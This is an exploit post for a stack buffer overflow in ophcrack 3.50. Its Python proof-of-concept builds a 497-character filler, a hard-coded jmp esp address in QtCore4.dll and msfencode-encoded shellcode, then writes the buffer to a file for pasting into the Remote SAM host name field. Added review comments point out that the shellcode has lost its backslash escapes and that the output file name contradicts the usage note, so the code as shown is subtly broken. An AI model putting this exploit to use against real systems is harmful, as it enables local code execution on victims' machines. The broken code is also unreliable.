
Ophcrack 3.50 Buffer Overflow / Code Execution

Posted on 22 May 2013

# Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF
# Date: 21.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://ophcrack.sourceforge.net/
# Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-#win32-installer-3.5.0.exe
# Version: 3.5.0
# Tested on: Windows XP SP3 Eng (32bits)
#!/usr/bin/python
#Stack based buffer overflow - direct EIP overwrite in this case (SEH based exploitation is possible as well)
#In order to exploit go to: Load -> Remote SAM -> put the content of buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash.
#pwdump6_setup.exe will be run by ophrack.It will nicely crash and execute the payload.
#pwdump6_setup itself doesn't look to be exploitable outside of ophrack.
#Kudos to Hostess for pointing me to
#http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html

# Review notes (reading this proof-of-concept from the defender's side):
# - The script itself only concatenates string constants and writes the
#   result to a local file; it performs no network or process activity.
#   The sink, per the usage note above, is the "Host name:" field of the
#   Load -> Remote SAM dialog, whose value reaches pwdump6_setup.exe.
# - The usage note says "buffer.txt", but the code below writes
#   'exploit.txt'; the two names do not agree.
# - As rendered on this page the string literals contain no backslash
#   escape sequences, so each literal evaluates to the visible ASCII
#   characters rather than to the byte values the msfencode comment
#   describes. NOTE(review): the filler length and offsets below belong
#   to the original escaped form — confirm before relying on them.
# - The 497-character filler is specific to the build named in the header;
#   a different version or build is not expected to place the saved return
#   address at the same distance.
shellcode = (
#windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c
# Adjacent string literals; Python concatenates them into one value.
"x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b"
"x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58"
"x50x38x41x42x75x4ax49x69x6cx79x78x6cx49x57x70"
"x65x50x65x50x75x30x6ex69x7ax45x44x71x7ax72x75"
"x34x4ex6bx46x32x30x30x4ex6bx56x32x34x4cx4ex6b"
"x36x32x54x54x4ex6bx73x42x71x38x36x6fx48x37x32"
"x6ax36x46x75x61x69x6fx34x71x49x50x6ex4cx55x6c"
"x30x61x61x6cx45x52x44x6cx57x50x6fx31x78x4fx56"
"x6dx47x71x69x57x7ax42x6ax50x31x42x46x37x4ex6b"
"x71x42x66x70x6ex6bx43x72x35x6cx66x61x58x50x6e"
"x6bx37x30x54x38x6ex65x6fx30x31x64x53x7ax56x61"
"x4ex30x66x30x6ex6bx50x48x65x48x4ex6bx30x58x65"
"x70x46x61x7ax73x6ax43x35x6cx43x79x6ex6bx46x54"
"x6ex6bx75x51x7ax76x75x61x49x6fx66x51x6bx70x4c"
"x6cx49x51x68x4fx66x6dx77x71x48x47x44x78x6bx50"
"x62x55x7ax54x34x43x61x6dx4ax58x67x4bx53x4dx66"
"x44x71x65x49x72x72x78x6ex6bx73x68x44x64x53x31"
"x5ax73x43x56x6ex6bx54x4cx30x4bx4ex6bx73x68x35"
"x4cx56x61x4bx63x4cx4bx66x64x6cx4bx46x61x58x50"
"x4fx79x32x64x56x44x54x64x73x6bx63x6bx65x31x31"
"x49x72x7ax62x71x49x6fx69x70x62x78x31x4fx30x5a"
"x6cx4bx44x52x5ax4bx4bx36x51x4dx53x5ax67x71x6c"
"x4dx4bx35x78x39x75x50x35x50x45x50x42x70x30x68"
"x35x61x6ex6bx42x4fx4dx57x79x6fx69x45x4dx6bx6b"
"x4ex66x6ex54x72x59x7ax43x58x59x36x4dx45x6dx6d"
"x4fx6dx39x6fx5ax75x75x6cx34x46x73x4cx57x7ax6d"
"x50x4bx4bx49x70x61x65x44x45x4fx4bx61x57x74x53"
"x32x52x52x4fx31x7ax43x30x36x33x39x6fx49x45x50"
"x63x65x31x32x4cx63x53x43x30x41x41")
#!mona jmp -r esp -cp ascii -> 0x6e2a2936 : jmp esp asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll]
# Return address: the fixed 0x6e2a2936 from the mona line above, written
# byte-reversed (little-endian). A hard-coded module address only works
# while QtCore4.dll loads at the same base every run; a rebased or
# ASLR-enabled module would be expected to break this, which is the
# mitigation angle on later Windows versions.
jmp="x36x29x2ax6e"
# Layout: 497 filler characters, then the return address that lands on
# the saved EIP ("direct EIP overwrite" per the note above), then the
# payload that esp points at after the jmp.
buffer = "A"*497 + jmp + shellcode
print(buffer)
# Output goes to 'exploit.txt' (the usage note above says buffer.txt).
# Style: `file` shadows the Python 2 builtin of the same name, and the
# handle is closed by hand rather than with a `with` block.
file = open('exploit.txt','w')
file.write(buffer)
file.close()

 
